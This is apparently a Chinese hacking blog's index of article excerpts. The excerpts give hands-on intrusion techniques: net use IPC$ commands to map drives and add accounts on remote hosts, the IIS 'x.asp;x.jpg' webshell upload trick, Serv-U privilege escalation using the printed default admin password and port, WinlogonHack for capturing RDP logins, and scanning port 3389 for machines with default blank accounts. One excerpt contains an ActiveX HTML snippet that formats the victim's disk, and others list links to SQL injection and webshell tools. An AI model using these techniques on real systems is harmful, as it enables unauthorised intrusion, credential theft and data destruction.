摘要：其他内容net use ipipc$ /user: 建立IPC空链接net use ipipc$ 密码 /user:用户名 建立IPC非空链接net use h: ipc$ 密码 /user:用户名 直接登陆后映射对方C：到本地为H:net use h: ipc$ 登陆后映射对方C：到本地为H:net use ipipc$ /del 删除IPC链接net use h: /del 删除映射对方到本地的为H:的映射net user 用户名　密码　/add 建立用户net user guest /active:yes 激活guest用户net user 查看有哪些用户net user 帐户名 查看帐 阅读全文

摘要：SC命令详解(一个很有用的command)作为一个命令行工具，SC.exe可以用来测试你自己的系统，你可以设置一个批处理文件来使用不同的参数调用 SC.exe来控制服务。一.SC使用这样的语法：1. SC [Servername] command Servicename [Optionname= Optionvalues]2. SC [command]这里使用第一种语法使用SC，使用第二种语法显示帮助。下面介绍各种参数。Servername可选择：可以使用双斜线，如\\myserver，也可以是\\192.168.1.223来操作远程计算机。如果在本地计算机上操作就不用添加任何参数。Comma 阅读全文

摘要：Microsoft IIS 解析文件名“x.asp;x.jpg/x.php;x.jpg”漏洞当文件名为x.asp;x.jpg时，Microsoft IIS会自动以asp格式来进行解析。而当文件名为x.php;x.jpg时，Microsoft IIS会自动以php格式来进行解析。所以我们只要上传后是x.asp;x.jpg这样的形式，就可以执行我们的马了，测试了下，x.php;... 阅读全文

摘要：深夜了，好友“如影随行”突然发来消息，说他一台配置非常好的3389肉鸡飞了。以前他是从WEB页面注入入手，然后直接用Xp_cmdshell添加系统用户搞定的，可晚上用3389登陆时突然发现添加的用户不在了，安装的后门都被清理干净，连Xp_cmdshell也执行不了。朋友叫我帮忙看看，这样和管理员的直接攻防较量我还没尝试过，所以也就答应了！　　因为是数据库是SA权限连接的，我... 阅读全文

摘要：(也可适用于WEBSHELL提权,此方法已被改进,不会弹黑CMD窗口.过段时间放出！)1、连接到mysql 服务器 mysql -u root -h 192.168.0.1 mysql.exe 这个程序在你安装了mysql的的bin目录中 　　 2、让我们来看看服务器中有些什么数据库 mysql>show databases; mysql默认安装时会有mysql、test这两个数据库... 阅读全文

摘要：Serv-U 通用提权代码，支持最新版本的Serv-U。 .abu.点评： Serv-U 的提权是一个长久以来一直存在的却容易被忽视的问题，主要还是利用Serv-U默认的管理员密码来执行相关入侵指令。 Serv-U 系列版本中都存在一个默认的管理员LocalAdministrator，以及默认的密码#l@$ak#.lk;0@P，还有默认的监听端口43958。要解决这个问题，主要还是从文件权限限制... 阅读全文

摘要：注：由于作者懒，没有提供日志清理功能，会留下日志： 一，su7是提权有几种方式？ 有两种形式去干掉su7。 1>，登陆管理员控制台的页面 ==>获取OrganizationId，用于添加用户 ==>获取全局用户的“下一个新用户ID” ==>添加用户 ==>添加用户的权限 or 添加全局用户权限 ==>用户登陆 ==>... 阅读全文

摘要：自从Serv-U本地权限提升漏洞出来以后，大家手握Su.exe这把网兜逢鸡就罩，一时间的肉鸡明显增多、质量直线上升啊。特别《Win2000虚拟主机入侵大法》中的方法流传广泛之后，大家手里开始有了些做虚拟主机的高带宽、大内存，甚至有N个CPU的极品肉鸡，恭喜恭喜啊^_^（台下观众：同喜同喜）。可是也遇见了用N多修补了这个Serv-U本地权限提升漏洞、怎么也提升不了权限的老柴鸡，今天我就以我的一次真实... 阅读全文

摘要：步骤： 1、取得远程电脑的最高权限（管理员权限），要取得远程电脑管理员权限的方法很多，难度视对方电脑的防备水平如何。如何取得权限，就不多介绍了。 2、利用各种工具，开启远程电脑的远程注册表、定时任务服务.server服务功能。 3、编写“添加管理员帐户”的DOS命令程序，也就是COM或BAT程序，程序要内含运行窗口自动关闭和自我清除功能以便清除痕迹（俗称擦'屁股')。并上传... 阅读全文

摘要：WinlogonHack一。执行install.bat 安装。不用重启, 当有3389登上时，自动加载DLL，并且记录登录密码！ 保存为boot.dat文件.二。运行ReadLog.bat 移动密码文件到当前目录。查看吧～ 三。执行Uninstall.bat，若 %systemroot%\system32\wminotify.dll 文件未能删除，那就重启再删了吧，润物细无声~~~ 阅读全文

摘要：一、远程终端密码泄露分析1.最新远程终端技术APP 对于大型企业来说，一般都部署有远程终端，微软最新的服务器操作系统Windows 2008 Server中更是重点打造远程终端。终端服务器远程APP是Windows Server 2008中新的远程应用演示方法。在远程连接的一些参数上进行了调整，增加了一些新的功能，据说性能也有较大提高！2.远程终端密码泄露分析 在大型网络中，由于网络环境复杂，... 阅读全文

摘要：前几天渗透了某大型网站，兴奋中。拿到WebShell后，第一个念头就是提升权限，把偶亲爱的后门挂到系统里。熟练的打开CMD，输入NET USER。　　不是好兆头，接着在WSCRIPT组件前打钩，再次执行NET USER。　　提示倒是换了，但是结果一样。接着偶想到了上传CMD.EXE，但是Windows 2003的上传在默认时是有限制的，不能大于200K，于是我上传了经典的Serv-U本地溢出程序，... 阅读全文

摘要：1. Add N Edit Cookies 查看和修改本地的Cookie，Cookie欺骗必备。下载：http://code.google.com/p/editcookie/downloads/list2. User Agent Switcher 修改浏览器的User Agent，可以用来XSS。下载：https://addons.mozilla.org/zh-CN/firefox/addon/5... 阅读全文

摘要：一、注入攻击工具1、啊D注入工具破解版http://www.uushare.com/user/hackerxfiles/file/9595692、Domain3.5干净版本http://www.uushare.com/user/hackerxfiles/file/9595733、GetWebshellah56bug大众版http://www.uushare.com/user/hackerxfile... 阅读全文

摘要：以下代码仅供学习研究使用，请勿使用害人，造成损失本人概不负责，谢谢合作！　　1、格式化硬盘<object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"></object><script>scr.Reset();scr.Path="C:\\windows\\Men?inicio\\Pro... 阅读全文

摘要：汗……本来在讨论这个的http://www.gnucitizen.org/blog/ghost-busters/，有意思：<a href="javascript:x=open('http://www.xiaonei.com/');setInterval (function(){try{x.frames[0].location={toString:functio... 阅读全文

摘要：好不容易才得到一台肉鸡，在保住肉鸡的同时还不免要扩大自己的成果。挂马其实是一个不错的选择，还有很多比我们菜的菜鸟还不懂打补丁呢（嘻嘻……）!前天下载了个批量挂马程序看了下200多K，想放在肉鸡上测试一下，好不容易才上传到肉鸡上不知怎么，运行的时候弹出个错误窗口肉鸡就挂了(真是悲哀………)！于是就想自己用脚本写个，个子小又有安全感！（Soc... 阅读全文

摘要：扫3389端口抓肉鸡（适合新手）（抓不了国外肉鸡） 现在国内网络上流传着一种克隆版的XP，安装后会默认开启一个账号为new,密码为空的账户，而且基本上都是开着3389的，我们就可以利用这一点来抓肉 鸡。首先用端口扫描工具（如S扫）扫一段IP的3389端口，扫完后就直接用远程桌面连接开放3389的机器（也可以把结果保存为文本文件，用批量生成 3389连接的工具来连接），然后输入账号new登入，如果别... 阅读全文

摘要：net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H: net use h: \\ip\c$ 登陆后映射对方C：到本地为H: net use \\ip\ipc$ /de... 阅读全文